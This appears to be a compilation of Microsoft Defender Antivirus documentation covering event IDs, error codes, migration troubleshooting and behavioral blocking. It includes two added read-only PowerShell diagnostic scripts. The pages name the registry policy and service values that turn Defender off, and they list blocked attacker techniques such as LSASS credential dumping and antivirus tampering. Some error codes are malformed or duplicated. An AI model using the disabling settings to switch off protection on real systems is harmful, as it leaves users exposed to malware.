Antivirus is no longer supported on your operating system, has stopped functioning,
and isn't protecting against malware threats.

Event ID 3002
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_FAILURE

Message: Real-time protection encountered an error and failed.

Description: Microsoft Defender Antivirus Real-Time Protection feature encountered an error and failed.

Feature: Feature. Examples: On Access, Internet Explorer downloads and Microsoft Outlook Express attachments, Behavior monitoring, or Network Inspection System.

Error Code: Result code associated with threat status. Standard HRESULT values.

Error Description: Description of the error.

Reason: The reason Microsoft Defender Antivirus real-time protection restarted a feature.

User action: You should restart the system then run a full scan because it's possible the
system wasn't protected for some time. The Microsoft Defender Antivirus client's real-
time protection feature encountered an error because one of the services failed to start.
If it's followed by a 3007 event ID, the failure was temporary and the antimalware client
recovered from the failure.

Event ID 3007
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_RECOVERED

Message: Real-time protection recovered from a failure. We recommend running a full system scan when you see this error.

Description: Microsoft Defender Antivirus Real-time Protection restarted a feature. It's recommended that you run a full system scan to detect any items that might have been missed while this agent was down.

Feature: Feature. Examples: On Access, IE downloads and Outlook Express attachments, Behavior monitoring, or Network Inspection System

Reason: The reason Microsoft Defender Antivirus real-time protection restarted a feature.

User action: The real-time protection feature restarted. If this event happens again,
contact Microsoft Technical Support.

Event ID 5000
Symbolic name: MALWAREPROTECTION_RTP_ENABLED

Message: Real-time protection is enabled.

Description: Microsoft Defender Antivirus real-time protection scanning for malware and
other potentially unwanted software was enabled.

Event ID 5001
Symbolic name: MALWAREPROTECTION_RTP_DISABLED

Message: Real-time protection is disabled.

Description: Microsoft Defender Antivirus real-time protection scanning for malware and
other potentially unwanted software was disabled.

Event ID 5004
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_CONFIGURED

Message: The real-time protection configuration changed.

Description: Microsoft Defender Antivirus real-time protection feature configuration changed.

Feature: Feature. Examples: On Access, IE downloads and Outlook Express attachments, Behavior monitoring, or Network Inspection System

Configuration:

Event ID 5007
Symbolic name: MALWAREPROTECTION_CONFIG_CHANGED

Message: The antimalware platform configuration changed.

Description: Microsoft Defender Antivirus configuration changed. If this event is unexpected, you should review the settings as the event might be the result of malware.

Old value: Old antivirus configuration value.

New value: New antivirus configuration value.

Event ID 5008
Symbolic name: MALWAREPROTECTION_ENGINE_FAILURE

Message: The antimalware engine encountered an error and failed.

Description: Microsoft Defender Antivirus engine was terminated due to an unexpected error.

Failure Type: Failure type. Examples: Crash or Hang

Exception Code: Error code

Resource: Resource

User action: To troubleshoot this event:

Try to restart the service.

For antimalware, antivirus and spyware, at an elevated command prompt, type net stop msmpsvc, and then type net start msmpsvc to restart the antimalware engine.

For the Network Inspection System, at an elevated command prompt, type net stop nissrv, and then type net start nissrv to restart the Network Inspection System engine by using the NiSSRV.exe file.

If it fails in the same way, look up the error code by accessing the Microsoft Support Site and entering the error number in the Search box, and contact Microsoft Technical Support.

User action: The Microsoft Defender Antivirus client engine stopped due to an unexpected error. To troubleshoot this event:

Run the scan again.

If it fails in the same way, go to the Microsoft Support site and enter the error number in the Search box to look for the error code.

Contact Microsoft Technical Support.

Event ID 5009
Symbolic name: MALWAREPROTECTION_ANTISPYWARE_ENABLED

Message: Scanning for malware and other potentially unwanted software is enabled.

Description: Microsoft Defender Antivirus enabled scanning for malware and other
potentially unwanted software.

Event ID 5010
Symbolic name: MALWAREPROTECTION_ANTISPYWARE_DISABLED

Message: Scanning for malware and other potentially unwanted software is disabled.

Description: Microsoft Defender Antivirus scanning for malware and other potentially
unwanted software is disabled.

Event ID 5011
Symbolic name: MALWAREPROTECTION_ANTIVIRUS_ENABLED

Message: Scanning for viruses is enabled.

Description: Microsoft Defender Antivirus enabled scanning for viruses.

Event ID 5012
Symbolic name: MALWAREPROTECTION_ANTIVIRUS_DISABLED

Message: Scanning for viruses is disabled.

Description: Microsoft Defender Antivirus scanning for viruses is disabled.

Event ID 5013
Symbolic name: MALWAREPROTECTION_SCAN_CANCELLED

Message: Tamper protection blocked a change to Microsoft Defender Antivirus.

Description: If Tamper protection is enabled, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked.

Event ID 5100
Symbolic name: MALWAREPROTECTION_EXPIRATION_WARNING_STATE

Message: The antimalware platform expires soon.

Description: Microsoft Defender Antivirus entered a grace period and will soon expire.
After expiration, this program will disable protection against viruses, spyware, and other
potentially unwanted software.

Expiration Reason: The reason Microsoft Defender Antivirus expires.

Expiration Date: The date Microsoft Defender Antivirus expires.

Event ID 5101
Symbolic name: MALWAREPROTECTION_DISABLED_EXPIRED_STATE

Message: The antimalware platform is expired.

Description: Microsoft Defender Antivirus grace period has expired. Protection against
viruses, spyware, and other potentially unwanted software is disabled.

Error Code: Result code associated with threat status. Standard HRESULT values.

Error Description: Description of the error.


Microsoft Defender Antivirus client error codes
If Microsoft Defender Antivirus experiences any issues, it will usually give you an error
code to help you troubleshoot the issue. Most often an error means there was a
problem installing an update. This section provides the following information about
Microsoft Defender Antivirus client errors.

The error code

The possible reason for the error

Advice on what to do now

Use the following information to help troubleshoot Microsoft Defender Antivirus error
codes.

Error code 0x80508007


Message: ERR_MP_NO_MEMORY

Possible reason: This error indicates that you might have run out of memory.

Resolution:

Check the available memory on your device.

Close any unused applications that are running to free up memory on your device.

Restart the device and run the scan again.

Error code 0x8050800C


Message: ERR_MP_BAD_INPUT_DATA

Possible reason: This error indicates that there might be a problem with your security
product.

Resolution:

Update the definitions. Either:

Get your security intelligence updates in the Windows Security app, or

Download the latest definitions from the Microsoft Security Intelligence site.

Note

The size of the definitions file downloaded from the site can exceed 60 MB and shouldn't be used as a long-term solution for updating definitions.

Run a full scan.

Restart the device and try again.

Error code 0x80508020


Message: ERR_MP_BAD_CONFIGURATION

Possible reason: This error indicates that there might be an engine configuration error.
Commonly, this error is related to input data that doesn't allow the engine to function
properly.

Error code 0x805080211


Message: ERR_MP_QUARANTINE_FAILED

Possible reason: This error indicates that Microsoft Defender Antivirus failed to
quarantine a threat.

Error code 0x80508022


Message: ERR_MP_REBOOT_REQUIRED

Possible reason: This error indicates that a reboot is required to complete threat
removal.

Error code 0x80508023


Message: ERR_MP_THREAT_NOT_FOUND

Possible reason: This error indicates that the threat might no longer be present on the
media, or malware might be stopping you from scanning your device.

Resolution: Run the Microsoft Safety Scanner then update your security software and try
again.

Error code 0x80508024


Message: ERR_MP_FULL_SCAN_REQUIRED

Possible reason: This error indicates that a full system scan might be required.

Resolution: Run a full system scan.

Error code 0x80508025


Message: ERR_MP_MANUAL_STEPS_REQUIRED

Possible reason: This error indicates that manual steps are required to complete threat
removal.

Resolution: Follow the manual remediation steps outlined in the Microsoft Malware Protection Encyclopedia. You can find a threat-specific link in the event history.

Error code 0x80508026


Message: ERR_MP_REMOVE_NOT_SUPPORTED

Possible reason: This error indicates that removal inside the container type might not be supported.

Resolution: Microsoft Defender Antivirus isn't able to remediate threats detected inside the archive. Consider manually removing the detected resources.

Error code 0x80508027

Message: ERR_MP_REMOVE_LOW_MEDIUM_DISABLED

Possible reason: This error indicates that removal of low and medium threats might be
disabled.

Resolution: Check the detected threats and resolve them as required.

Error code 0x80508029


Message: ERROR_MP_RESCAN_REQUIRED

Possible reason: This error indicates a rescan of the threat is required.

Resolution: Run a full system scan.

Error code 0x80508030


Message: ERROR_MP_CALLISTO_REQUIRED

Possible reason: This error indicates that an offline scan is required.

Resolution: Run offline Microsoft Defender Antivirus. For more information, see Help protect my PC with Microsoft Defender Offline.

Error code 0x80508031


Message: ERROR_MP_PLATFORM_OUTDATED

Possible reason: This error indicates that Microsoft Defender Antivirus doesn't support
the current version of the platform and requires a new version of the platform.

Resolution: You can only use Microsoft Defender Antivirus in Windows 10 and Windows
11. For Windows 8, Windows 7 and Windows Vista, you can use System Center Endpoint
Protection.

Internal error codes

The following error codes are used during internal testing of Microsoft Defender Antivirus. If you see these errors, you can try to update definitions and force a rescan directly on the endpoint.

Error code 0x80501004


Message displayed: ERROR_MP_NO_INTERNET_CONN

Possible reason for error and resolution: Check your Internet connection, then run the
scan again.

Error code 0x80501000


Message displayed: ERROR_MP_UI_CONSOLIDATION_BASE

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501001


Message displayed: ERROR_MP_ACTIONS_FAILED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501002


Message displayed: ERROR_MP_NOENGINE

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501003


Message displayed: ERROR_MP_ACTIVE_THREATS

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x805011011


Message displayed: MP_ERROR_CODE_LUA_CANCELLED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501101


Message displayed: ERROR_LUA_CANCELLATION

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501102


Message displayed: MP_ERROR_CODE_ALREADY_SHUTDOWN

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501103


Message displayed: MP_ERROR_CODE_RDEVICE_S_ASYNC_CALL_PENDING

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501104


Message displayed: MP_ERROR_CODE_CANCELLED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501105


Message displayed: MP_ERROR_CODE_NO_TARGETOS

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.
Error code 0x80501106
Message displayed: MP_ERROR_CODE_BAD_REGEXP

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501107


Message displayed: MP_ERROR_TEST_INDUCED_ERROR

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80501108


Message displayed: MP_ERROR_SIG_BACKUP_DISABLED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508001


Message displayed: ERR_MP_BAD_INIT_MODULES

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508002


Message displayed: ERR_MP_BAD_DATABASE

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508004


Message displayed: ERR_MP_BAD_UFS
Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050800C


Message displayed: ERR_MP_BAD_INPUT_DATA

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050800D


Message displayed: ERR_MP_BAD_GLOBAL_STORAGE

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050800E


Message displayed: ERR_MP_OBSOLETE

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050800F


Message displayed: ERR_MP_NOT_SUPPORTED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050800F


Message displayed: ERR_MP_NO_MORE_ITEMS

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508010


Message displayed: ERR_MP_NO_MORE_ITEMS

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508011


Message displayed: ERR_MP_DUPLICATE_SCANID

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508012


Message displayed: ERR_MP_BAD_SCANID

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508013


Message displayed: ERR_MP_BAD_USERDB_VERSION

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508014


Message displayed: ERR_MP_RESTORE_FAILED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80508016


Message displayed: ERR_MP_BAD_ACTION

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.
Error code 0x80508019
Message displayed: ERR_MP_NOT_FOUND

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80509001


Message displayed: ERR_RELO_BAD_EHANDLE

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x80509003


Message displayed: ERR_RELO_KERNEL_NOT_LOADED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050A001


Message displayed: ERR_MP_BADDB_OPEN

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050A002


Message displayed: ERR_MP_BADDB_HEADER

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050A003


Message displayed: ERR_MP_BADDB_OLDENGINE
Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050A004


Message displayed: ERR_MP_BADDB_CONTENT

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050A005


Message displayed: ERR_MP_BADDB_NOTSIGNED

Possible reason for error and resolution: This error is internal. The cause isn't clearly
defined.

Error code 0x8050801


Message displayed: ERR_MP_REMOVE_FAILED

Possible reason for error and resolution: This error is internal. It might be triggered when
malware removal isn't successful.

Error code 0x80508018


Message displayed: ERR_MP_SCAN_ABORTED

Possible reason for error and resolution: This error is internal. It might have triggered
when a scan fails to complete.



Troubleshoot Microsoft Defender Antivirus while migrating from a non-Microsoft solution
FAQ

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Use this article to resolve issues while migrating from a non-Microsoft security solution
to Microsoft Defender Antivirus.

Review event logs


1. Open the Event viewer app by selecting the Search icon in the taskbar, and
searching for event viewer.

Information about Microsoft Defender Antivirus can be found under Applications and Services Logs > Microsoft > Windows > Windows Defender.

2. From there, select Open underneath Operational.

Selecting an event from the details pane shows you more information about an
event in the lower pane, under the General and Details tabs.

Microsoft Defender Antivirus doesn't start.

This issue can manifest in the form of several different event IDs, all of which have the same underlying cause.

Associated event IDs


Event ID 15
Log name: Application
Description: Updated Windows Defender status successfully to
SECURITY_PRODUCT_STATE_OFF.
Source: Security Center

Event ID 5007
Log name: Microsoft-Windows-Windows Defender/Operational
Description: Microsoft Defender Antivirus Configuration has changed. If this is an
unexpected event, you should review the settings as this issue could be due to
malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning =
0x1
Source: Windows Defender

Event ID 5010
Log name: Microsoft-Windows-Windows Defender/Operational
Description: Microsoft Defender Antivirus scanning for spyware and other potentially unwanted software is disabled.
Source: Windows Defender
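As an added example (not part of the article), the following PowerShell pulls the state-change events listed above from the Windows Defender/Operational log and the Application log so they can be reviewed without clicking through Event Viewer. It assumes an elevated session on Windows 10/11; the Security Center provider is matched loosely because the article shows its source only as "Security Center", and the event-ID meanings are the ones given in the event reference earlier on this page.

```powershell
# Added example, not from the article. Assumes an elevated PowerShell session on
# Windows 10/11 where the Microsoft-Windows-Windows Defender/Operational log exists.

# Event IDs from the article's event reference and what each one tells the investigator.
$DefenderStateEvents = @{
    3002 = 'Real-time protection encountered an error and failed'
    5001 = 'Real-time protection is disabled'
    5007 = 'Antimalware platform configuration changed (review if unexpected)'
    5010 = 'Scanning for malware and other potentially unwanted software is disabled'
    5013 = 'Tamper protection blocked a change to Microsoft Defender Antivirus'
}

function Get-DefenderStateEvents {
    [CmdletBinding()]
    param(
        [int]$Hours = 24
    )
    $since = (Get-Date).AddHours(-$Hours)

    # Operational log: the Defender events the article describes.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = @($DefenderStateEvents.Keys)
        StartTime = $since
    }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        $old = $null
        $new = $null
        if ($e.Id -eq 5007) {
            # 5007 messages carry "Old value: ..." and "New value: ..." lines (as in the
            # IsServiceRunning example above); keep them so the changed setting is visible.
            if ($e.Message -match 'Old value:\s*(?<old>[^\r\n]+)') { $old = $Matches.old.Trim() }
            if ($e.Message -match 'New value:\s*(?<new>[^\r\n]+)') { $new = $Matches.new.Trim() }
        }
        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            Log         = 'Windows Defender/Operational'
            Id          = $e.Id
            Meaning     = $DefenderStateEvents[$e.Id]
            OldValue    = $old
            NewValue    = $new
        }
    }

    # Application log: Security Center event 15 reports the antivirus product state
    # (the article shows SECURITY_PRODUCT_STATE_OFF). The provider name is matched
    # loosely because the article only shows the source as "Security Center".
    $scFilter = @{ LogName = 'Application'; Id = 15; StartTime = $since }
    Get-WinEvent -FilterHashtable $scFilter -ErrorAction SilentlyContinue |
        Where-Object { $_.ProviderName -like 'Security*Center' } |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Log         = 'Application'
                Id          = $_.Id
                Meaning     = 'Security Center antivirus product state update'
                OldValue    = $null
                NewValue    = ($_.Message -replace '\s+', ' ').Trim()
            }
        }
}

# Usage: review the last 7 days, most recent first.
Get-DefenderStateEvents -Hours 168 | Sort-Object TimeCreated -Descending | Format-Table -AutoSize
```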

How to tell if Microsoft Defender Antivirus doesn't start because a non-Microsoft antivirus is installed.

On a Windows 10 or Windows 11 device, if you aren't using Microsoft Defender for Endpoint, and you have a non-Microsoft antivirus installed, then Microsoft Defender Antivirus is automatically turned off. If you're using Microsoft Defender for Endpoint with a non-Microsoft antivirus installed, Microsoft Defender Antivirus starts in passive mode, with reduced functionality.

 Tip

The scenario described earlier applies only to Windows 10 and Windows 11. Other versions of Windows have different responses to Microsoft Defender Antivirus being run alongside non-Microsoft security software.

Use the Services app to check if Microsoft Defender Antivirus is turned off.

To open the Services app, select the Search icon from the taskbar and search for services.
You can also open the app from the command-line by typing services.msc.

Information about Microsoft Defender Antivirus is listed within the Services app under
Windows Defender > Operational. The antivirus service name is Microsoft Defender
Antivirus Service.

While checking the app, you might see that Microsoft Defender Antivirus Service is set to
manual, but when you try to start this service manually, you get a warning. The warning
might say, The Microsoft Defender Antivirus Service service on Local Computer started and
then stopped. Some services stop automatically if they aren't in use by other services or
programs.

This issue indicates that Microsoft Defender Antivirus was automatically turned off to
preserve compatibility with a non-Microsoft antivirus.

Generate a detailed report

You can generate a detailed report about currently active group policies by opening a
command prompt in Run as admin mode, then entering the following command:

Console

GPresult.exe /h gpresult.html

This command generates a report located at ./gpresult.html. Open this file and you
might see the following results, depending on how Microsoft Defender Antivirus was
turned off.

Group policy results

If security settings are implemented via group policy (GPO) at the domain or local level, or through System Center Configuration Manager (SCCM)

Within the GPResults report, under the heading, Windows Components/Microsoft Defender Antivirus, you might see something like the following entry, indicating that Microsoft Defender Antivirus is turned off.

Policy: Turn off Microsoft Defender Antivirus
Setting: Enabled
Winning GPO: Win10-Workstations

If security settings are implemented via Group policy preference (GPP)

Under the heading, Registry item (Key path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, Value name: DisableAntiSpyware), you might see something like the following entry, indicating that Microsoft Defender Antivirus is turned off.

DisableAntiSpyware
Winning GPO: Win10-Workstations
Result: Success
General
Action: Update
Properties
Hive: HKEY_LOCAL_MACHINE
Key path: SOFTWARE\Policies\Microsoft\Windows Defender
Value name: DisableAntiSpyware
Value type: REG_DWORD
Value data: 0x1 (1)

If security settings are implemented via registry key

The report might contain the following text, indicating that Microsoft Defender Antivirus
is turned off:

Registry (regedit.exe)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DisableAntiSpyware (dword) 1 (hex)

If security settings are set in Windows or your Windows Server image

Your imaging admin might have set the security policy, DisableAntiSpyware, locally via GPEdit.exe, LGPO.exe, or by modifying the registry in their task sequence. You can configure a Trusted Image Identifier for Microsoft Defender Antivirus.
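As an added example (not from the article), this PowerShell function reads, without changing anything, the places the sections above say can turn Microsoft Defender Antivirus off: the DisableAntiSpyware policy value, the WinDefend service, the running mode reported by Get-MpComputerStatus, and any non-Microsoft antivirus registered with Security Center. It assumes Windows 10/11, an elevated session, and the root/SecurityCenter2 WMI namespace (present on client editions of Windows, not on Windows Server).

```powershell
# Added example, not from the article. Read-only: it reports why Microsoft Defender
# Antivirus might be off and never edits services, policy, or registry values.
# Assumptions: Windows 10/11, elevated session, root/SecurityCenter2 namespace present.

function Get-DefenderDisableState {
    [CmdletBinding()]
    param()

    # 1. Policy value that GPO, GPP, SCCM, or an image task sequence can set.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $policy = Get-ItemProperty -Path $policyKey -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    $disableAntiSpyware = $null
    if ($null -ne $policy) { $disableAntiSpyware = [int]$policy.DisableAntiSpyware }

    # 2. Microsoft Defender Antivirus Service (service name WinDefend).
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $serviceStatus = 'not installed'
    $serviceStart  = $null
    if ($svc) {
        $serviceStatus = $svc.Status.ToString()
        $serviceStart  = $svc.StartType.ToString()
    }

    # 3. Running mode from the Defender PowerShell module (e.g. Normal, Passive Mode).
    $status = $null
    try { $status = Get-MpComputerStatus -ErrorAction Stop } catch { }
    $amMode = $null; $avEnabled = $null; $rtpEnabled = $null; $tamper = $null
    if ($status) {
        $amMode     = $status.AMRunningMode
        $avEnabled  = $status.AntivirusEnabled
        $rtpEnabled = $status.RealTimeProtectionEnabled
        $tamper     = $status.IsTamperProtected
    }

    # 4. Non-Microsoft antivirus registered with Security Center (assumption: the
    #    root/SecurityCenter2 namespace exposed by client editions of Windows).
    $thirdParty = @()
    try {
        $thirdParty = @(Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction Stop |
            Where-Object { $_.displayName -notlike 'Windows Defender*' -and $_.displayName -notlike 'Microsoft Defender*' } |
            ForEach-Object { $_.displayName })
    } catch { }

    # Map the findings onto the causes the article walks through.
    if ($disableAntiSpyware -eq 1) {
        $verdict = "DisableAntiSpyware = 1 under $policyKey (GPO, GPP, registry, or image); confirm with GPresult.exe /h gpresult.html"
    } elseif ($thirdParty.Count -gt 0 -and $amMode -like '*Passive*') {
        $verdict = "Passive mode alongside non-Microsoft antivirus: $($thirdParty -join ', ')"
    } elseif ($thirdParty.Count -gt 0) {
        $verdict = "Turned off for compatibility with non-Microsoft antivirus: $($thirdParty -join ', ')"
    } elseif ($svc -and $svc.Status -ne 'Running') {
        $verdict = "WinDefend is $serviceStatus with no policy value or non-Microsoft antivirus found; review the 5001/5007/5010 events"
    } else {
        $verdict = 'Microsoft Defender Antivirus appears to be active'
    }

    [pscustomobject]@{
        DisableAntiSpyware    = $disableAntiSpyware
        ServiceStatus         = $serviceStatus
        ServiceStartType      = $serviceStart
        AMRunningMode         = $amMode
        AntivirusEnabled      = $avEnabled
        RealTimeProtection    = $rtpEnabled
        TamperProtected       = $tamper
        NonMicrosoftAntivirus = ($thirdParty -join ', ')
        Verdict               = $verdict
    }
}

# Usage: print one object describing the current state and the likely cause.
Get-DefenderDisableState | Format-List
```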

Turn Microsoft Defender Antivirus back on


Microsoft Defender Antivirus automatically turns on if no other antivirus is currently
active. You need to turn the non-Microsoft antivirus off to ensure Microsoft Defender
Antivirus can run with full functionality.

Warning

Solutions suggesting that you edit the Windows Defender start values for wdboot, wdfilter, wdnisdrv, wdnissvc, and windefend in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services are unsupported, and might force you to reimage your system.

Passive mode is available if you start using Microsoft Defender for Endpoint and a non-
Microsoft antivirus together with Microsoft Defender Antivirus. Passive mode allows
Microsoft Defender Antivirus to scan files and update itself, but it doesn't remediate
threats in passive mode. In addition, behavior monitoring via Real Time Protection isn't
available in passive mode, unless Endpoint data loss prevention (DLP) is deployed.

Another feature, known as limited periodic scanning, is available to end-users when Microsoft Defender Antivirus is set to turn off automatically. This feature allows Microsoft Defender Antivirus to scan files periodically alongside a non-Microsoft antivirus, using a limited number of detections.

Important

Limited periodic scanning isn't recommended in enterprise environments. The detection, management, and reporting capabilities available when running Microsoft Defender Antivirus in this mode are reduced as compared to active mode.

 Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Microsoft Defender Antivirus compatibility
Microsoft Defender Antivirus in the Windows Security app



Behavioral blocking and containment
Article • 02/13/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

Want to experience Defender for Endpoint? Sign up for a free trial.

Overview
Today's threat landscape is overrun by fileless malware that lives off the land, highly polymorphic threats that mutate faster than traditional solutions can keep up with, and human-operated attacks that adapt to what adversaries find on compromised devices. Traditional security solutions aren't sufficient to stop such attacks; you need artificial intelligence (AI) and device learning (ML) backed capabilities, such as behavioral blocking and containment, included in Defender for Endpoint.

Behavioral blocking and containment capabilities can help identify and stop threats,
based on their behaviors and process trees even when the threat has started execution.
Next-generation protection, EDR, and Defender for Endpoint components and features
work together in behavioral blocking and containment capabilities.

Behavioral blocking and containment capabilities work with multiple components and
features of Defender for Endpoint to stop attacks immediately and prevent attacks from
progressing.

Next-generation protection (which includes Microsoft Defender Antivirus) can detect threats by analyzing behaviors, and stop threats that have started running.

Endpoint detection and response (EDR) receives security signals across your
network, devices, and kernel behavior. As threats are detected, alerts are created.
Multiple alerts of the same type are aggregated into incidents, which makes it
easier for your security operations team to investigate and respond.
Defender for Endpoint has a wide range of optics across identities, email, data, and
apps, in addition to the network, endpoint, and kernel behavior signals received
through EDR. A component of Microsoft Defender XDR, Defender for Endpoint
processes and correlates these signals, raises detection alerts, and connects related
alerts in incidents.

With these capabilities, more threats can be prevented or blocked, even if they start
running. Whenever suspicious behavior is detected, the threat is contained, alerts are
created, and threats are stopped in their tracks.

The following image shows an example of an alert that was triggered by behavioral
blocking and containment capabilities:

Components of behavioral blocking and containment

On-client, policy-driven attack surface reduction rules: Predefined common attack behaviors are prevented from executing, according to your attack surface reduction rules. When such behaviors attempt to execute, they can be seen in Microsoft Defender XDR as informational alerts. Attack surface reduction rules aren't enabled by default; you configure your policies in the Microsoft Defender portal.

Client behavioral blocking: Threats on endpoints are detected through machine learning, and then are blocked and remediated automatically. (Client behavioral blocking is enabled by default.)

Feedback-loop blocking (also referred to as rapid protection): Threat detections are observed through behavioral intelligence. Threats are stopped and prevented from running on other endpoints. (Feedback-loop blocking is enabled by default.)

Endpoint detection and response (EDR) in block mode: Malicious artifacts or behaviors that are observed through post-breach protection are blocked and contained. EDR in block mode works even if Microsoft Defender Antivirus isn't the primary antivirus solution. (EDR in block mode isn't enabled by default; you turn it on at Microsoft Defender XDR.)

Expect more to come in the area of behavioral blocking and containment, as Microsoft
continues to improve threat protection features and capabilities. To see what's planned
and rolling out now, visit the Microsoft 365 roadmap.

Examples of behavioral blocking and containment in action
Behavioral blocking and containment capabilities have blocked attacker techniques such
as the following:

Credential dumping from LSASS
Cross-process injection
Process hollowing
User Account Control bypass
Tampering with antivirus (such as disabling it or adding the malware as exclusion)
Contacting Command and Control (C&C) to download payloads
Coin mining
Boot record modification
Pass-the-hash attacks
Installation of root certificate
Exploitation attempt for various vulnerabilities

Below are two real-life examples of behavioral blocking and containment in action.

Example 1: Credential theft attack against 100 organizations
As described in In hot pursuit of elusive threats: AI-driven behavior-based blocking
stops attacks in their tracks, a credential theft attack against 100 organizations around
the world was stopped by behavioral blocking and containment capabilities. Spear-
phishing email messages that contained a lure document were sent to the targeted
organizations. If a recipient opened the attachment, a related remote document was
able to execute code on the user's device and load Lokibot malware, which stole
credentials, exfiltrated stolen data, and waited for further instructions from a command-
and-control server.

Behavior-based device-learning models in Defender for Endpoint caught and stopped
the attacker's techniques at two points in the attack chain:

The first protection layer detected the exploit behavior. Device-learning classifiers
in the cloud correctly identified the threat and immediately instructed the client
device to block the attack.
The second protection layer, which helped stop cases where the attack got past
the first layer, detected process hollowing, stopped that process, and removed the
corresponding files (such as Lokibot).

While the attack was detected and stopped, alerts, such as an "initial access alert," were
triggered and appeared in the Microsoft Defender portal.

This example shows how behavior-based device-learning models in the cloud add new
layers of protection against attacks, even after they have started running.

Example 2: NTLM relay - Juicy Potato malware variant

As described in the recent blog post, Behavioral blocking and containment:
Transforming optics into protection, in January 2020, Defender for Endpoint detected
a privilege escalation activity on a device in an organization. An alert called "Possible
privilege escalation using NTLM relay" was triggered.

The threat turned out to be malware; it was a new, not-seen-before variant of a
notorious hacking tool called Juicy Potato, which is used by attackers to get privilege
escalation on a device.

Minutes after the alert was triggered, the file was analyzed, and confirmed to be
malicious. Its process was stopped and blocked, as shown in the following image:

A few minutes after the artifact was blocked, multiple instances of the same file were
blocked on the same device, preventing more attackers or other malware from
deploying on the device.

This example shows that with behavioral blocking and containment capabilities, threats
are detected, contained, and blocked automatically.

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Next steps
Learn more about Defender for Endpoint

Configure your attack surface reduction rules

Enable EDR in block mode

See recent global threat activity

Get an overview of Microsoft Defender XDR

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Client behavioral blocking
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platform

Windows

